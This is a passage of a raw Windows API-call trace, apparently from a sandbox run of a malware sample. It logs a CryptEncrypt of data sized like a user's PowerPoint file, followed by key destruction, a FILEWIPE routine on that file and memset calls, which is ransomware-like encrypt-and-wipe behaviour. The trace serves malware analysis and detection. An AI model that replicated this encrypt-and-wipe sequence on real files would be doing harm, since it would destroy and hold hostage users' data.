hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.542] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.542] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0171.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.543] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.543] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.543] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.543] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.543] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.544] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.544] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x4d63, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4d70) returned 1 [0171.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.544] CharLowerBuffW (in: lpsz="byte[19825]", cchLength=0xb | out: lpsz="byte[19825]") returned 0xb [0171.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.545] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.545] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.565] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9eec70*, pdwDataLen=0x87e820*=0x4d63, dwBufLen=0x4d70 | out: pbData=0x9eec70*, pdwDataLen=0x87e820*=0x4d70) returned 1 [0171.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.566] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.567] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.567] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.567] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.567] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.567] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.567] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.567] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.567] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.567] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.573] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0171.573] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.573] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.574] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0171.574] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.574] CryptDestroyKey (hKey=0x90af18) returned 1 [0171.574] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.574] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.574] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.574] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.574] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0171.574] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0171.574] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.574] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0171.574] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.574] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.574] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.575] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.575] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.575] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.575] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.575] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.575] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0171.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.575] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.575] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.575] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.575] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.575] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.575] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0171.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.575] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.575] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.575] FreeLibrary (hLibModule=0x74f20000) returned 1 [0171.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.575] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.576] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.576] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.578] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.578] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0171.578] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.579] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.579] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bdfbc0, ftCreationTime.dwHighDateTime=0x1d593aa, ftLastAccessTime.dwLowDateTime=0x189ff370, ftLastAccessTime.dwHighDateTime=0x1d5ac29, ftLastWriteTime.dwLowDateTime=0x189ff370, ftLastWriteTime.dwHighDateTime=0x1d5ac29, nFileSizeHigh=0x0, nFileSizeLow=0x4d63, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="KuxYygUpCCsKE_KnyRa.pptx", cAlternateFileName="KUXYYG~1.PPT")) returned 0x90ae18 [0171.579] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0171.579] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.579] CharLowerBuffW (in: lpsz="byte[19811]", cchLength=0xb | out: lpsz="byte[19811]") returned 0xb [0171.579] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.580] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0171.580] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.609] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0171.609] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0171.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0171.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26d8 [0171.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26d8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0171.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.610] FreeLibrary (hLibModule=0x75c90000) returned 1 [0171.610] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0171.610] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 